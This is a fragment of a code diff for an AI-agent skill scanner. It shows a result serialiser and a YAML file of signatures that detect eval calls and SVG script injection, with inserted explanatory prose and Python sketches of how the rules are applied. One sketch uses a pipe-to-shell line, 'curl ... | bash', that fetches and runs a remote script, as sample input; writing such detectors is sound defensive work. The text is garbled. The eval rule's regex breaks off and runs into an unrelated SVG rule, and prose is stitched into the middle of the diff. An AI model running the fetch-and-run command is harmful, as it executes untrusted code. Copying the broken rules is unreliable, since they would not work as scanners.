"analyzers_used": self.analyzers_used, + "timestamp": self.timestamp.isoformat(), 
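`is_safe` and `max_severity` above rank severities with an explicit ordered list rather than relying on enum comparison. A self-contained sketch of the same ranking — the `Severity` members mirror the values used in this diff, but the real enum is defined elsewhere in the package, so this local copy is an assumption:

```python
from enum import Enum


class Severity(Enum):
    # Assumed member values; the shipped enum lives elsewhere in the scanner.
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"
    SAFE = "safe"


# Explicit worst-to-best ordering, as in ScanResult.max_severity.
_ORDER = [Severity.CRITICAL, Severity.HIGH, Severity.MEDIUM,
          Severity.LOW, Severity.INFO]


def max_severity(severities: list[Severity]) -> Severity:
    """Return the highest-ranked severity present, or SAFE for an empty scan."""
    for sev in _ORDER:
        if sev in severities:
            return sev
    return Severity.SAFE


def is_safe(severities: list[Severity]) -> bool:
    """Mirror ScanResult.is_safe: no CRITICAL or HIGH findings."""
    return not any(s in (Severity.CRITICAL, Severity.HIGH) for s in severities)


found = [Severity.LOW, Severity.MEDIUM, Severity.LOW]
worst = max_severity(found)  # MEDIUM outranks LOW
safe = is_safe(found)        # True: nothing CRITICAL or HIGH
```

The explicit list keeps the ranking independent of member declaration order, at the cost of needing an update if a new severity level is ever added.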
+ } + if self.analyzers_failed: + result["analyzers_failed"] = self.analyzers_failed + return result diff --git a/src/copaw/security/skill_scanner/rules/signatures/command_injection.yaml b/src/copaw/security/skill_scanner/rules/signatures/command_injection.yaml new file mode 100644 index 000000000..1d41736b0 --- /dev/null +++ b/src/copaw/security/skill_scanner/rules/signatures/command_injection.yaml @@ -0,0 +1,194 @@ +# Command & Code Injection Signatures +# Detects dangerous code execution, shell injection, path traversal, and SQL injection + +- id: COMMAND_INJECTION_EVAL + category: command_injection + severity: CRITICAL + patterns: + - "(?]*>[^<]*" + - "\\bon\\w+\\s*=\\s*[\"'][^\"']*[\"']" + - "javascript\\s*:" + file_types: [other] + description: "SVG file contains embedded script tags or event handlers that can execute JavaScript" + remediation: "Remove all
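Signatures like the ones in this file are applied by `SecurityRule.scan_content` in two passes: a fast per-line search, plus a full-text pass for patterns containing `\n`, whose line numbers are recovered by counting newlines before the match start. A minimal sketch of both passes — the regexes are illustrative stand-ins, not the shipped patterns:

```python
import re

content = (
    "import os\n"
    "result = eval(user_input)\n"
    "curl -s http://example.com/x.sh \\\n"
    " | bash\n"
)

# Pass 1: line-based matching with 1-based line numbers.
line_pat = re.compile(r"\beval\s*\(")  # illustrative eval signature
line_hits = [
    (num, line)
    for num, line in enumerate(content.split("\n"), start=1)
    if line_pat.search(line)
]

# Pass 2: multiline matching (pipe-to-shell split across a line continuation);
# recover the starting line with the same newline-count trick as scan_content.
multi_pat = re.compile(r"curl[^\n]*\\\n[^\n]*bash")
m = multi_pat.search(content)
start_line = content.count("\n", 0, m.start()) + 1
```

Splitting the work this way keeps the common case cheap: most signatures never cross a line boundary, so the full-text `finditer` pass only runs for the few patterns that genuinely need it.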